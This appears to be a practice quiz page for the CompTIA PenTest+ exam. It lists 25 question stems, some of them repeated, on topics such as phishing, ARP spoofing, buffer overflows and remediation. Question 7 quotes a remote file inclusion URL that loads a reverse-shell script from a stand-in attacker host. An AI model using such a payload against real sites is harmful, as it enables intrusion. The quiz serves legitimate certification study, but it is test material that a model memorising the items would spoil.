Home > CompTIA PenTest+ Certification > Quizzes > PT0-001: CompTIA PenTest+ Certification Exam
PT0-001: CompTIA PenTest+ Certification Exam
Fast practice, instant feedback. Timer auto-submits when time’s up.
Avg score: 31% Most missed: “Which of the following is an example of a spear phishing attack?”
PT0-001: CompTIA PenTest+ Certification Exam
Time left 00:00
25 Questions

1. Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this?
2. A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal?
3. A penetration tester executes the following commands: Which of the following is a local host vulnerability that the attacker is exploiting?
4. A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?
5. A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output: Which of the following is the tester intending to do?
6. Which of the following is an example of a spear phishing attack?
7. While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php Which of the following remediation steps should be taken to prevent this type of attack?
8. A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?
9. Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?
10. During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?
11. Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?
12. Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this?
13. A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?
14. An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?
15. A penetration tester executes the following commands: Which of the following is a local host vulnerability that the attacker is exploiting?
16. Which of the following tools would a penetration tester leverage to conduct OSINT?
17. A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?
18. A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST?
19. A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?
20. Which of the following tools would a penetration tester leverage to conduct OSINT?
21. A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?
22. Which of the following tools is used to perform a credential brute force attack?"
23. A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended?
24. A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?
25. Which of the following tools is used to perform a credential brute force attack?"